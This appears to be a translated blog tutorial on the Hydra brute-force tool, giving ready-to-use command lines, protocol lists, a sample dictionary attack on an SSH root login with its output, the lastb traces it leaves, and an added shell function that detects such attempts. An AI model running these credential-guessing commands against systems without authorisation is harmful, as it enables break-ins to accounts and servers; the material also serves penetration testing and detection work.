
Using the Brute-Force Tool Hydra

谭池暝
2023-12-01

Kali ships with hydra, so it can be used directly; the installation process is not covered here.

Commonly used commands:

  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

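Parameter descriptions:

-l            the username to brute-force [commonly used]
-L            a file of usernames; use this option instead when there are many usernames stored in a file
-p            the password to use [commonly used]
-P            the password file to use
ftp://        the protocol to brute-force; ftp is used here, and other common ones include ssh, rdp, mysql and redis
192.168.0.1   the IP address of the target machine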

 

hydra supports brute-forcing the following protocols:

adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hands-on test

Target machine: 139.x.x.x

Target service: ssh

Password dictionary: top100.txt (dictionary download: https://download.csdn.net/download/helloexp/20107342)

hydra -l root -P top100.txt ssh://139.x.x.x -t 4 -V -I

The run looks like this:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-09 16:02:14
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 100 login tries (l:1/p:100), ~25 tries per task
[DATA] attacking ssh://139.x.x.x:22
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456789" - 1 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "a123456" - 2 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456" - 3 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "a123456789" - 4 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "1234567890" - 5 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "woaini1314" - 6 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "qq123456" - 7 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "abc123456" - 8 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456a" - 9 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456789a" - 10 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "147258369" - 11 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "zxcvbnm" - 12 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "987654321" - 13 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "12345678910" - 14 of 100 [child 2] (0/0)

On the target server, look at the traces the brute-force attempt leaves behind:

[root@hack139 log]# lastb
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)

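You can see that hydra is trying the passwords in the dictionary one by one, and that each failed attempt is recorded by lastb.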
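The same lastb trace can be turned into a simple detection on the defending side. The following is an added example, not part of the original post: a shell function that reads lastb output and reports every source address that produced at least a given number of failed logins within one minute. The function names, the threshold and the sample lines (documentation addresses) are assumptions constructed for the example.

```shell
#!/bin/sh
# Added example: flag brute-force sources in `lastb` output.
# Usage on a real host (as root): lastb -i | flag_bruteforce 10

flag_bruteforce() {
    # $1 = minimum failed logins from one source within one minute (default 10)
    awk -v thr="${1:-10}" '
        # Skip blank lines and the trailing "btmp begins ..." line.
        NF < 7 || $1 == "btmp" { next }
        {
            # Fields: user tty source weekday month day HH:MM ...
            key = $3 SUBSEP $5 " " $6 " " $7      # source + minute bucket
            hits[key]++
            # Count distinct usernames tried per source and minute.
            if (!((key, $1) in seen)) { seen[key, $1] = 1; users[key]++ }
        }
        END {
            for (key in hits) {
                if (hits[key] >= thr) {
                    split(key, part, SUBSEP)
                    printf "%s %s failures=%d users=%d\n",
                           part[1], part[2], hits[key], users[key]
                }
            }
        }
    ' | sort
}

# Constructed sample in lastb layout: one noisy source, one single failure.
sample_lastb() {
    for i in 1 2 3 4 5 6 7 8 9 10 11 12; do
        echo "root     ssh:notty    203.0.113.7   Fri Jul  9 16:03 - 16:03  (00:00)"
    done
    echo "admin    ssh:notty    203.0.113.7   Fri Jul  9 16:03 - 16:03  (00:00)"
    echo "alice    ssh:notty    198.51.100.4  Fri Jul  9 16:05 - 16:05  (00:00)"
    echo ""
    echo "btmp begins Thu Jul  1 03:12:01 2021"
}

# Stand-alone run on the constructed sample.
sample_lastb | flag_bruteforce 10
```

A single mistyped password stays below the threshold, while a dictionary run like the one above shows up as one line per source and minute.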
